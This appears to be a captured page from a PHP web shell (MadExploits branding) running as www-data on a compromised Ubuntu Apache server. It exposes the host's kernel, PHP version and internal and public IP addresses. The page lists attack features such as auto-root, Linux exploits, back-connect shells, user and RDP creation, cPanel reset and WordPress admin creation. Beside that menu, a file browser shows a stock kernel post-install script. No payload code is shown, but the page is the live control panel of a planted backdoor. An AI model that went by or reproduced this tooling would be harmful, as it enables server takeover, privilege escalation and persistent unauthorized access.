Linux quad-clini-stageVM 5.4.0-1109-azure #115~18.04.1-Ubuntu SMP Mon May 22 20:06:37 UTC 2023 x86_64
Apache/2.4.29 (Ubuntu)
: 10.2.0.4 | : 3.145.53.35
Cant Read [ /etc/named.conf ]
7.4.25
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
etc /
kernel /
postinst.d /
[ HOME SHELL ]
Name
Size
Permission
Action
apt-auto-removal
2.83
KB
-rwxr-xr-x
initramfs-tools
868
B
-rwxr-xr-x
unattended-upgrades
185
B
-rwxr-xr-x
update-notifier
751
B
-rwxr-xr-x
xx-update-initrd-links
882
B
-rwxr-xr-x
zz-update-grub
646
B
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : update-notifier
#!/bin/sh # we do not include ". gettext.sh" here because: # a) it breaks if its not available # b) the string we have here does not need it (because it has no vars) eval_gettext() { if [ -x /usr/bin/gettext ]; then echo $(gettext "$1") else echo "$1" fi } export TEXTDOMAIN=update-notifier export TEXTDOMAINDIR=/usr/share/locale case "$DPKG_MAINTSCRIPT_PACKAGE::$DPKG_MAINTSCRIPT_NAME" in linux-image-extra*::postrm) exit 0;; esac if [ "$0" = "/etc/kernel/postinst.d/update-notifier" ]; then DPKG_MAINTSCRIPT_PACKAGE=linux-base fi # Wake the applet up echo "*** $(eval_gettext "System restart required") ***" > /var/run/reboot-required echo "$DPKG_MAINTSCRIPT_PACKAGE" >> /var/run/reboot-required.pkgs
Close